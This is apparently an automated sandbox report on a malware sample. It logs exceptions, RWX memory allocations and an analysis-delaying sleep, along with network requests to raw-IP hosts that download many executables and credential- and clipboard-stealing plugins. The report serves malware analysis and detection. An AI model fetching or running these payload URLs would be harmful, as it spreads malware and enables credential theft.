registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 10773018
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdbf6 @ 0xaddbf6
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10773018
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdcd2 @ 0xaddcd2
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 5832704
registers.esi: 10027008
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdcd2 @ 0xaddcd2
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdcd2 @ 0xaddcd2
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdcd2 @ 0xaddcd2
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10773018
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdcd2 @ 0xaddcd2
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdda4 @ 0xaddda4
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 5832704
registers.esi: 10027008
registers.ecx: 2030420
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdda4 @ 0xaddda4
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bde9e @ 0xadde9e
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 5832704
registers.esi: 10027008
registers.ecx: 1643292471
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bde9e @ 0xadde9e
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bde9e @ 0xadde9e
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bde9e @ 0xadde9e
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdf34 @ 0xaddf34
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 5832704
registers.esi: 10027008
registers.ecx: 2315255495
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdf34 @ 0xaddf34
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10773018
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
explorhe+0x1bb2f0 @ 0x11bb2f0
explorhe+0x1498dc @ 0x11498dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: explorhe+0x126204
exception.instruction: ud2
exception.module: explorhe.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0x1126204
registers.esp: 3406036
registers.edi: 18571404
registers.eax: 0
registers.ebp: 3406064
registers.edx: 2
registers.ebx: 8008628
registers.esi: 5
registers.ecx: 8008628
1 0 0
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/go.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/go.exe
suspicious_features Connection to IP address suspicious_request HEAD http://185.215.113.68/mine/amer.exe
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.68/mine/amer.exe
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/nika.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/nika.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.215.113.68/theme/index.php
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/vimu.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/vimu.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.68/mine/stan.exe
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/networ.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/networ.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/moto.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.68/theme/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.68/theme/Plugins/clip64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/store.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/TrueCrypt_NKwtUN.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/kskskfsf.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.172.128.19/latestrocki.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/gold1234.exe
suspicious_features Connection to IP address suspicious_request GET http://185.172.128.90/cpa/ping.php?substr=seven&s=ab
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/crypted.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/rdx1122.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/alex.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/leg221.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/Awwnbpxqsf.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/2024.exe
request HEAD http://109.107.182.3/cost/go.exe
request GET http://109.107.182.3/cost/go.exe
request HEAD http://185.215.113.68/mine/amer.exe
request GET http://185.215.113.68/mine/amer.exe
request HEAD http://109.107.182.3/cost/nika.exe
request GET http://109.107.182.3/cost/nika.exe
request POST http://185.215.113.68/theme/index.php
request HEAD http://109.107.182.3/cost/vimu.exe
request GET http://109.107.182.3/cost/vimu.exe
request GET http://185.215.113.68/mine/stan.exe
request HEAD http://109.107.182.3/cost/networ.exe
request GET http://109.107.182.3/cost/networ.exe
request GET http://109.107.182.3/lego/moto.exe
request GET http://185.215.113.68/theme/Plugins/cred64.dll
request GET http://185.215.113.68/theme/Plugins/clip64.dll
request GET http://109.107.182.3/lego/store.exe
request GET http://109.107.182.3/lego/TrueCrypt_NKwtUN.exe
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET http://109.107.182.3/lego/kskskfsf.exe
request GET http://185.172.128.19/latestrocki.exe
request GET http://109.107.182.3/lego/gold1234.exe
request GET http://185.172.128.90/cpa/ping.php?substr=seven&s=ab
request GET http://109.107.182.3/lego/crypted.exe
request GET http://109.107.182.3/lego/rdx1122.exe
request GET http://109.107.182.3/lego/alex.exe
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://109.107.182.3/lego/leg221.exe
request GET http://109.107.182.3/lego/Awwnbpxqsf.exe
request GET http://109.107.182.3/lego/2024.exe
request GET https://db-ip.com/demo/home.php?s=175.208.134.152
request GET https://accounts.google.com/
request GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ASKXGp3437MpdLqeJXXmnjo86ElWj-h7hAFZEOqRy5ULnXiPzkWs5AxnDO0Ovl-mxK_rlOLCFHwf
request GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp3vDgA9dYQaukba9RXlX2wDMY1M-AxrCojfMZ91Il_gwrJz-Ee78hH-C5Y4mLG_WvowvhkPKQ&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S1963367809%3A1706140574270777
request GET https://accounts.google.com/_/bscframe
request GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request GET https://accounts.google.com/favicon.ico
request GET https://www.google.com/favicon.ico
request GET https://accounts.google.com/generate_204?QWfFag
request POST http://185.215.113.68/theme/index.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 2936832
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 147456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 475136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 114688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a22000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3012
region_size: 8261632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02f60000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3012
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7587c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7589c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7587c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7589c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ce3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d87000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757c9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75522000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75862000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3012
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03530000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a22000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72181000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 604
region_size: 11341824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x030e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 604
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03bb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7587c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7589c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7587c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7589c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ce3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d87000
process_handle: 0xffffffff
1 0 0
description explorhe.exe tried to sleep 308 seconds, actually delayed analysis time by 308 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

 number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

